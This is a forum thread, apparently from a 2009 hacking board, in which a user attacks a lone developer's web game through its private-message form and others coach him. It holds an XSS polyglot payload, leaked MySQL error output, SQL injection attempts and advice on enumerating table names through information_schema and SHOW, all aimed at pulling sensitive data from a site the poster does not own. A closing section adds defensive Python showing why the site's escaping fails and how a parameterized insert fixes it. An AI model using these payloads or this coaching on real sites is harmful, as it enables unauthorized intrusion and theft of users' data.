XSS Help.
Posted on 04-01-09 00:31
Ok, so I've found a hole in a web page that doesn't need detailing. I used this code:
Code
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>



and the appropriate box shows up saying 'XSS', telling me the page is vuln to XSS. But, I also got an OLE DB error, giving me a DB footprint on the page. I know I can execute JS commands with XSS, but my question is, can I execute SQL commands with XSS?
Posted on 04-01-09 00:41
Yeah you can, it's called SQL Injection.
Posted on 04-01-09 02:00
Well, it depends on the error...


spyware
Posted on 04-01-09 02:10
Obviously the input passes through a database. The XSS you're getting is just icing. I'd focus on injecting SQL commands, it might be a possibility (depending NOT on the error message but rather the way the input is used).



Posted on 04-01-09 02:14
Of course, the error message depends on the input! lol


spyware
Posted on 04-01-09 02:34
454447415244 wrote:
Of course, the error message depends on the input! lol


Could be the case, yeah. What also could be the case is that the script outputs random (fake) errors to confuse hackers.



Posted on 04-01-09 02:45
This is the error I get when I input the XSS (after the JS box saying 'XSS' pops up)
Code
INSERT INTO W1.messages (GameID, FromA, FromWorld, ToA, ToWorld, Message, SentTime, Title ) VALUES (1, 8157, 'W1', 7030, 'W1', ''';alert(String.fromCharCode(88,83,83))//\'';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))', NOW(), 'sd')

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[MySQL][ODBC 5.1 Driver][mysqld-5.0.67-community-nt]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\' at line 1

/W1/Pidgeon.asp, line 74





This is being injected into a sort of PM system for the web app. It seems as if this is directly affecting the GET and INSERT functions. What I really want to know though: is there any way to get sensitive info from this?
Posted on 04-01-09 02:58
Narc0tiX wrote:
This is the error I get when I input the XSS (after the JS box saying 'XSS' pops up)
Code
INSERT INTO W1.messages (GameID, FromA, FromWorld, ToA, ToWorld, Message, SentTime, Title ) VALUES (1, 8157, 'W1', 7030, 'W1', ''';alert(String.fromCharCode(88,83,83))//\'';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))', NOW(), 'sd')

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[MySQL][ODBC 5.1 Driver][mysqld-5.0.67-community-nt]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\' at line 1

/W1/Pidgeon.asp, line 74





This is being injected into a sort of PM system for the web app. It seems as if this is directly affecting the GET and INSERT functions. What I really want to know though: is there any way to get sensitive info from this?


l0l, it is vulnerable to SQL Injection! :happy:

@spyware
yeah, but what an ideal system is this! lol
It might be the case, but usually vulnerabilities are found in places where the webmaster wasn't aware of! ;) unless he's a dumb ass web developer! :p


Posted on 04-01-09 04:36
Well, he's a one man army. I'm pretty sure he's the only developer. He had staff before, but they all resigned.

Are you sure it's vuln to SQL pwn? 'Cuz I injected XSS with JS not SQL...
Posted on 04-01-09 05:42
Ok, so it's VERY vuln to SQL injection. But I have another question: what's the best way to find table names? I tried:
Code
\' 1' AND 1=(SELECT COUNT(*) FROM tablenames); --



but I get
Code
INSERT INTO W1.messages (GameID, FromA, FromWorld, ToA, ToWorld, Message, SentTime, Title ) VALUES (1, 8157, 'W1', 7030, 'W1', 'lolololol', NOW(), '\'' 1'' AND 1=(SELECT COUNT(*) FROM tablenames); --')

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[MySQL][ODBC 5.1 Driver][mysqld-5.0.67-community-nt]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' AND 1=(SELECT COUNT(*) FROM tablenames); --')' at line 1

/W1/Pidgeon.asp, line 74




Which really isn't any info that is useful or relevant to the command...
Posted on 04-01-09 05:48
You could try information_schema.tables or DESCRIBE. Use Intellitamper to find out everything you can about the site. For instance, I was just looking through some files on this one site and found a bunch of table names and descriptions. You never know what you might find. Wink


Posted on 04-01-09 06:47
Yeah, I just used Intellitamper. I found the script that assigns the cookies values, but that's about it. The dev must've hidden the rest.
Posted on 04-01-09 07:09
Then try information_schema.tables or try to guess it.


Posted on 04-01-09 13:49
Skunkfoot wrote:
You could try information_schema.tables or DESCRIBE.

Not DESCRIBE... that's for when you know the table name and want to know the table fields, types, etc. The other way to discover table names (other than information_schema.tables) would be SHOW. Love that command.


Posted on 04-01-09 17:39
Ok so I inject SQL that contains a \ (backslash) and a ' (single quote) to escape filters. But every time, I get an error bitching about the syntax associated with the backslash and single quote. But, when I don't include either one of the two, it sends the PM and the page loads normally. Any idea on how to mark up my commands in order to get what I desire?
Posted on 04-01-09 18:08
@Zephyr: Now that I think about it, that makes a lot more sense. >.<

@Other Guy: Post the error? Oftentimes the error message contains useful information.


Posted on 04-01-09 18:25
I get this:
Code
INSERT INTO W1.messages (GameID, FromA, FromWorld, ToA, ToWorld, Message, SentTime, Title ) VALUES (1, 8157, 'W1', 7030, 'W1', '.', NOW(), '\''SHOW table_name FROM information_schema.tables''')

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[MySQL][ODBC 5.1 Driver][mysqld-5.0.67-community-nt]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'SHOW table_name FROM information_schema.tables''')' at line 1

/W1/Pidgeon.asp, line 74




After inputting this
Code
\'SHOW table_name FROM information_schema.tables'


Posted on 04-01-09 19:53
Looks like you'd need to escape from the VALUES block before you could attempt your injection; otherwise, your query will cause an error because it's still part of the INSERT. Also, from the error message you're getting, you can see how your apostrophe is being "escaped"... so, it looks like you're doing that right.
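
From the defending side, the logged statements in this thread show quotes being doubled while backslashes pass through unchanged. The following is an added example, not part of the thread or the site's code, showing why that escaping does not keep a value inside its MySQL string literal and what the parameterized form looks like. The function names, sample value and table are constructed, and sqlite3 stands in for the MySQL driver.

```python
import sqlite3

def double_quotes_only(value):
    # What the logged INSERT statements suggest the page does (assumption
    # drawn from the error output): ' becomes '', backslashes are untouched.
    return value.replace("'", "''")

def escape_backslash_too(value):
    # Escapes both characters that are special inside a MySQL string literal
    # when NO_BACKSLASH_ESCAPES is off (the default sql_mode).
    return value.replace("\\", "\\\\").replace("'", "''")

def literal_end(sql, start=0):
    """Index just past the quote that closes the literal opening at sql[start],
    following MySQL's default rules; -1 if the literal never closes."""
    i = start + 1
    while i < len(sql):
        if sql[i] == "\\":
            i += 2                      # backslash consumes the next character
        elif sql[i] == "'":
            if sql[i + 1:i + 2] == "'":
                i += 2                  # '' is one literal quote
            else:
                return i + 1            # real end of the literal
        else:
            i += 1
    return -1

def stays_in_literal(escaper, value):
    # True only if the whole escaped value is parsed as string data.
    literal = "'" + escaper(value) + "'"
    return literal_end(literal) == len(literal)

def store_parameterized(value):
    # The fix: the value travels separately from the SQL text, so no escaping
    # rule is involved. Table and column names are constructed.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE messages (title TEXT)")
    db.execute("INSERT INTO messages (title) VALUES (?)", (value,))
    return db.execute("SELECT title FROM messages").fetchone()[0]

SAMPLE = "\\'tail"   # constructed input: backslash, quote, text

if __name__ == "__main__":
    print(stays_in_literal(double_quotes_only, SAMPLE))    # literal closes early
    print(stays_in_literal(escape_backslash_too, SAMPLE))
    print(store_parameterized(SAMPLE) == SAMPLE)
```

Manual escaping is shown only to explain the failure; the parameterized insert is the form to deploy, together with turning off verbose database errors in page output.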